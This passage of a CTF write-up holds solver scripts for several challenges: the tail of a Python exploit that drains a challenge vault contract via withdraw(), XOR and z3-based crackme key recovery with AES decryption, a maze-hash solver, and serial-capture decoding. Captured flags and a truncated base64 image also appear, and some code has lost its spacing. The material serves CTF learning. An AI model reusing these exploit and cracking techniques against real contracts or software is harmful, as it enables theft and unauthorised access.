"nonce": nonce,
"gas": 200000,
"gasPrice": gp,
"chainId": cid,
        }
    )
    send_tx(w3, acct, tx)
    nonce += 1
    tx = vault.functions.withdraw().build_transaction(
        {
"from": me,
"nonce": nonce,
"gas": 200000,
"gasPrice": gp,
"chainId": cid,
        }
    )
    send_tx(w3, acct, tx)
return vault.functions.isSolved().call()
defmain():
    r = remote(HOST, PORT)
    banner = r.recvuntil(b"> ").decode(errors="ignore")
    rpc, vault, pk = parse_instance(banner)
    ok = exploit(rpc, vault, pk)
    r.sendline(b"1")
    out = r.recvall(timeout=5).decode(errors="ignore")
    m = re.search(r"Flag\s*-\s*([A-Za-z0-9_{}-]+)", out)
if m:
        print(m.group(1))
else:
        print(str(ok), out.strip())
if __name__ == "__main__":
    main()

EH4X{c4ll1ng_m4d3_s000_e45y_th4t_my_m0m_d03snt_c4ll_m3}

Reverse:

i guess bro

MOD = 0x3B9ACA07# 1_000_000_007
defrecover_flag_from_rodata() -> bytes:
    unk = bytes([
0xE0, 0xEA, 0x9F, 0xE8, 0xC2, 0xFF, 0xBF, 0xE1, 0xC2, 0xFD,
0x96, 0xDB, 0x82, 0x8D, 0xF4, 0xA8, 0x8A, 0xA6, 0xB3, 0x14,
0x5D, 0x69, 0x4D, 0x35, 0x7E, 0x69, 0x4C, 0x7B, 0x13, 0x5A,
0x14, 0x17, 0x28, 0x71, 0x36
    ])
assert len(unk) == 35
    out = bytearray(35)
for i, b in enumerate(unk):
        out[i] = b ^ ((7 * i) & 0xFF) ^ 0xA5
return bytes(out)
defcheck_sub_10622(a1: bytes) -> bool:
if len(a1) != 35:
returnFalse
if a1[0] != ord("E"):
returnFalse
ifnot (a1[1] == ord("H") and a1[2] == ord("4") and a1[3] == ord("X") and a1[4] == ord("{")):
returnFalse
if a1[34] != ord("}"):
returnFalse
if sum(a1) != 3243:
returnFalse
    idxs = [5, 10, 15, 20, 25, 30]
    prod = 1
for idx in idxs:
        prod = (prod * a1[idx]) % MOD
return prod == 531_969_937
defmain():
    flag_bytes = recover_flag_from_rodata()
    print("[+] Recovered bytes:", flag_bytes)
try:
        flag_str = flag_bytes.decode("ascii")
except UnicodeDecodeError:
        flag_str = flag_bytes.decode("ascii", errors="replace")
    print("[+] Flag string:", flag_str)
    print("[+] Length:", len(flag_bytes))
if __name__ == "__main__":
    main()

Pathfinder

import sys
GRID = [
0x08, 0x0A, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x05, 0x00, 0x00, 0x08, 0x0A, 0x0A, 0x0C, 0x00,
0x00, 0x00, 0x03, 0x00, 0x00, 0x05, 0x00, 0x00, 0x05, 0x00,
0x08, 0x0A, 0x0A, 0x0A, 0x0A, 0x01, 0x00, 0x00, 0x05, 0x00,
0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x0A, 0x01, 0x00,
0x05, 0x00, 0x0C, 0x0A, 0x0C, 0x00, 0x05, 0x00, 0x00, 0x00,
0x05, 0x00, 0x05, 0x00, 0x05, 0x00, 0x05, 0x00, 0x00, 0x00,
0x05, 0x00, 0x01, 0x00, 0x03, 0x0A, 0x09, 0x00, 0x08, 0x0C,
0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x05,
0x03, 0x0A, 0x0A, 0x0A, 0x0A, 0x0A, 0x0A, 0x0A, 0x01, 0x03,
]
TARGET_HASH = 0x86BA520C
MOVE_MASK = {"N": 0x0104, "S": 0x0401, "E": 0x0802, "W": 0x0208}
MOVE_DELTA = {"N": (-1, 0), "S": (1, 0), "E": (0, 1), "W": (0, -1)}
defrol32(v: int, b: int) -> int:
return ((v << b) | (v >> (32 - b))) & 0xFFFFFFFF
defh(path: str) -> int:
    v = 0xDEADBEEF
for ch in path.encode():
        v = (73244475 * rol32(v ^ ch, 13)) & 0xFFFFFFFF
    t = (((-2048144789) & 0xFFFFFFFF) * ((v ^ (v >> 16)) & 0xFFFFFFFF)) & 0xFFFFFFFF
return ((t >> 13) ^ t) & 0xFFFFFFFF
defflag(path: str) -> str:
    out, i = "EHAX{", 0
while i < len(path):
        j = i
while j < len(path) and path[j] == path[i]:
            j += 1
        cnt = j - i
        out += path[i] if cnt == 1elsef"{cnt}{path[i]}"
        i = j
return out + "}"
defok(path: str) -> bool:
    x = y = 0
for ch in path:
if ch notin MOVE_DELTA:
returnFalse
        dx, dy = MOVE_DELTA[ch]
        nx, ny = x + dx, y + dy
ifnot (0 <= nx <= 9and0 <= ny <= 9):
returnFalse
        v4 = GRID[10 * x + y] | (GRID[10 * nx + ny] << 8)
if (MOVE_MASK[ch] & v4) == 0:
returnFalse
        x, y = nx, ny
return (x, y) == (9, 9) and h(path) == TARGET_HASH
if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1else"EESSSWWSSSSSSEEEEEEEENNESS"
    print("valid:", ok(path))
    print("hash:", hex(h(path)))
    print("flag:", flag(path))
# EHAX{2E3S2W6S8E2NE2S}

compute it

题目中有两个附件

validator接收两个浮点数参数，把它们当成复数，来跑Newton迭代

signal_data.txt每行就是一对浮点数，也就是一个复数初值

根据validator和signal_data.txt可以计算出一些0/1数据

然后再把0/1数据按顺序重排成一个 20 行、130 列的黑白图，就能看到一行像素字。

#!/usr/bin/env python3
from __future__ import annotations
import argparse
from pathlib import Path
from typing import List, Sequence, Tuple
from PIL import Image
defcheck_point(x: float, y: float) -> int:
    iterations = 0
    miss = 0
while miss <= 0x31:
# f(z) = z^3 - 1
        f_re = x * x * x - 3.0 * x * y * y - 1.0
        f_im = 3.0 * x * x * y - y * y * y
# f'(z) = 3z^2
        d_re = 3.0 * (x * x - y * y)
        d_im = 6.0 * x * y
        den = d_re * d_re + d_im * d_im
if den < 1e-9:
break
        delta_re = (f_re * d_re + f_im * d_im) / den
        delta_im = (f_im * d_re - f_re * d_im) / den
        x -= delta_re
        y -= delta_im
        iterations += 1
if abs(x - 1.0) < 1e-6and abs(y) < 1e-6:
break
        miss += 1
return1if iterations == 12else0
defload_points(path: Path) -> List[Tuple[float, float]]:
    points: List[Tuple[float, float]] = []
for lineno, raw in enumerate(path.read_text(encoding="utf-8").splitlines(), 1):
        line = raw.strip()
ifnot line:
continue
        x_str, y_str = line.split(",")
        points.append((float(x_str), float(y_str)))
return points
defrender_bitmap(bits: Sequence[int], width: int, height: int, scale: int = 10, invert: bool = False) -> Image.Image:
if len(bits) != width * height:
raise ValueError(f"bit count {len(bits)} does not match {width}x{height}")
    img = Image.new("1", (width, height), 1)
    px = img.load()
for idx, bit in enumerate(bits):
        x = idx % width
        y = idx // width
        pixel = 0if bit else1
if invert:
            pixel = 1 - pixel
        px[x, y] = pixel
if scale > 1:
        img = img.resize((width * scale, height * scale), Image.NEAREST)
return img
defall_factor_pairs(n: int):
    pairs = []
for h in range(1, int(n ** 0.5) + 1):
if n % h == 0:
            w = n // h
            pairs.append((w, h))
return pairs
defmain():
    parser = argparse.ArgumentParser()
    parser.add_argument("signal", nargs="?", default="signal_data.txt")
    parser.add_argument("-o", "--output", default="flag_130x20.png")
    parser.add_argument("--width", type=int, default=130)
    parser.add_argument("--height", type=int, default=20)
    parser.add_argument("--scale", type=int, default=10)
    parser.add_argument("--invert", action="store_true")
    parser.add_argument("--dump-factors", action="store_true")
    args = parser.parse_args()
    signal_path = Path(args.signal)
    points = load_points(signal_path)
    bits = [check_point(x, y) for x, y in points]
    print(f"loaded points : {len(points)}")
    print(f"valid pixels  : {sum(bits)}")
    print(f"factor pairs  : {all_factor_pairs(len(bits))}")
    img = render_bitmap(bits, args.width, args.height, scale=args.scale, invert=args.invert)
    out_path = Path(args.output)
    img.save(out_path)
    print(f"saved main image to: {out_path}")
if args.dump_factors:
        base = out_path.with_suffix("")
for w, h in all_factor_pairs(len(bits)):
            layout = render_bitmap(bits, w, h, scale=max(1, args.scale), invert=args.invert)
            layout_path = base.parent / f"{base.name}_{w}x{h}.png"
            layout.save(layout_path)
            print(f"saved candidate layout: {layout_path}")
if __name__ == "__main__":
    main()

图像解出来之后如下，解完纯在测试相似符

EH4X{N3WT0N_W45_R1GHT}

kaje

C1 = 0xff51afd7ed558ccd
C2 = 0xc4ceb9fe1a85ec53
defmix64(x):
    x &= 0xffffffffffffffff
    x ^= x >> 33
    x = (x * C1) & 0xffffffffffffffff
    x ^= x >> 33
    x = (x * C2) & 0xffffffffffffffff
    x ^= x >> 33
return x
defgen_keystream(seed):
    a2 = seed & 0xffffffffffffffff
    out = bytearray()
for r in range(32):
        x = (a2 + r) & 0xffffffffffffffff
        v3 = (C1 * (x ^ (x >> 33))) & 0xffffffffffffffff
        t  = (v3 ^ (v3 >> 33)) & 0xffffffffffffffff
        a2 = (C2 * t) & 0xffffffffffffffff
        a2 = (a2 ^ (a2 >> 33)) & 0xffffffffffffffff
        out.append(a2 & 0xff)
return bytes(out)
ct = bytes.fromhex(
"9f12d91be212bbbafbf5fee8a632acc6"
"043692d4c93bbdbe22a2b4836b4503d3"
)
defsolve(is_docker, has_overlay):
    v0 = 0xCD9AADD8D9C9A989
ifnot is_docker:
        v0 = 0x1337133713371337
if has_overlay:
        v0 ^= 0xABCDEF1234567890
    seed = mix64(v0)
    ks = gen_keystream(seed)
    pt = bytes(a ^ b for a, b in zip(ct, ks))
return pt
for d in [True, False]:
for o in [True, False]:
        pt = solve(d, o)
        print(d, o, pt)

ghosty

XChaCha20-Poly1305 加盐生成的key 解密 R0M1 的blob ，拿到的 elf 里存了 ghost_8d3f4a91c2e7b6d0。

 % nc chall.ehax.in 22222
== interface check ==
Send one line as your candidate input (max 32 bytes).
> ghost_8d3f4a91c2e7b6d0
EH4X{fr3k7_fri3n5dly_1nt3rf4c35_0nc3_4g41n}

ghostKey

z3：

from z3 import *
import hashlib
from Crypto.Cipher import AES
PRINT_MIN = 0x20
PRINT_MAX = 0x7E
target_lfsr = 0x4358
target_nibble = [8,8,4,7]
target_col = [0x0C,0x27,0x08,0x00,0x37,0x21,0x32,0x60]
target_tag = [0x6C,0x75,0x3A,0x01,0x7E,0x2F,0x34,0x00]
target_sbox_xor = 0x66
pairs = [
    (0,31,127,104),
    (3,28,131,17),
    (7,24,113,53),
    (11,20,109,58),
    (1,15,103,52),
    (5,27,97,88),
    (9,22,107,20),
    (13,18,101,64),
    (2,29,127,81),
    (6,25,131,118),
    (10,21,113,40),
    (14,17,109,83),
]
enc = bytes([
0x00,0x37,0xA8,0x85,0x8C,0x84,0xFD,0x73,0x23,0x3E,0xE9,0x35,0x71,0xD8,0x2B,0xDE,
0x4F,0x18,0x46,0xE8,0x12,0x41,0xAF,0x6D,0xF9,0x5E,0xD4,0xBD,0x15,0x6A,0x89,0x99
])
prefix = b"crackme{"
# AES S-box (standard)
sbox = [
0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5,0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76,
0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0,0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0,
0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc,0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15,
0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a,0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75,
0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0,0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84,
0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b,0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf,
0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85,0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8,
0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5,0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2,
0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17,0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73,
0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88,0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb,
0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c,0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79,
0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9,0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08,
0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6,0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a,
0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e,0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e,
0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94,0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf,
0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68,0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16,
]
s = Solver()
k = [BitVec(f'k{i}', 8) for i in range(32)]
# printable
for i in range(32):
    s.add(k[i] >= PRINT_MIN, k[i] <= PRINT_MAX)
# func1 length already fixed =32
# func8 tag: XOR per 4 bytes
for i in range(8):
    a = 4*i
    s.add(k[a] ^ k[a+1] ^ k[a+2] ^ k[a+3] == target_tag[i])
# func4 nibble: per 8 bytes, XOR of ((hi^lo)&0xF)
defnib8(v):
    hi = LShR(v,4) & 0xF
    lo = v & 0xF
return (hi ^ lo) & 0xF
for g in range(4):
    acc = BitVecVal(0,8)
for j in range(8):
        acc = acc ^ nib8(k[8*g+j])
    s.add(acc == BitVecVal(target_nibble[g], 8))
# func5 colsum: 4x8 matrix col sums mod 97
for c in range(8):
    sm = ZeroExt(8,k[c]) + ZeroExt(8,k[c+8]) + ZeroExt(8,k[c+16]) + ZeroExt(8,k[c+24])
    s.add(URem(sm, 97) == target_col[c])
# func6 pairs
for a,b,mod,res in pairs:
    sm = ZeroExt(8,k[a]) + ZeroExt(8,k[b])
    s.add(URem(sm, mod) == res)
# func7 sbox even positions XOR
SBOX = Array('SBOX', BitVecSort(8), BitVecSort(8))
for i,val in enumerate(sbox):
    s.add(Select(SBOX, BitVecVal(i,8)) == BitVecVal(val,8))
acc = BitVecVal(0,8)
for i in range(0,32,2):
    acc = acc ^ Select(SBOX, k[i])
s.add(acc == target_sbox_xor)
# func3 LFSR 16-bit: encode as BitVec(16) update
deflfsr_step(state16, byte8):
    st = state16
    x = byte8
for _ in range(8):
        lsb = (st ^ ZeroExt(8,x)) & 1
        st = LShR(st,1)
        x  = LShR(x,1)
        st = If(lsb != 0, st ^ BitVecVal(0xB400,16), st)
return st
st = BitVecVal(0xACE1,16)
for i in range(32):
    st = lfsr_step(st, k[i])
s.add(st == target_lfsr)
# ----- solve -----
if s.check() != sat:
    print("unsat")
    quit()
m = s.model()
key_bytes = bytes([m.eval(k[i]).as_long() for i in range(32)])
print("KEY =", key_bytes)
print("KEY(str) =", key_bytes.decode(errors="replace"))
aeskey = hashlib.sha256(key_bytes).digest()
iv = hashlib.md5(key_bytes[16:]).digest()
pt = AES.new(aeskey, AES.MODE_CBC, iv).decrypt(enc)
print("PT =", pt)
print("PT(str) =", pt.decode(errors="replace"))
print("prefix ok?", pt.startswith(prefix))

aes 的实现反汇编有点问题：
import hashlib
from Crypto.Cipher import AES
key = b"Gh0stK3y-R3v3rs3-M3-1f-U-C4n!!!!"
enc = bytes([
    0x00,0x37,0xA8,0x85,0x8C,0x84,0xFD,0x73,0x23,0x3E,0xE9,0x35,0x71,0xD8,0x2B,0xDE,
    0x4F,0x18,0x46,0xE8,0x12,0x41,0xAF,0x6D,0xF9,0x5E,0xD4,0xBD,0x15,0x6A,0x89,0x99
])
# asm-confirmed derivation:
aes_key = hashlib.sha256(key[:16]).digest()   # keyBytes[:16]
iv      = hashlib.md5(key[16:]).digest()      # keyBytes[16:]
pt = AES.new(aes_key, AES.MODE_CBC, iv).decrypt(enc)
print("PT bytes:", pt)
print("PT str  :", pt.decode("utf-8", errors="replace"))
print("prefix ok?", pt.startswith(b"crackme{"))
# try extract crackme{...}
s = pt.decode("utf-8", errors="ignore")
if "crackme{" in s:
    start = s.index("crackme{")
    end = s.find("}", start)
    if end != -1:
        print("FLAG:", s[start:end+1])
//crackme{AES_gh0stk3y_r3v3rs3d!!}

Misc:

Baby serial

logic分析得到的内容：
Async Serial 格式：
115200, 8N1
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 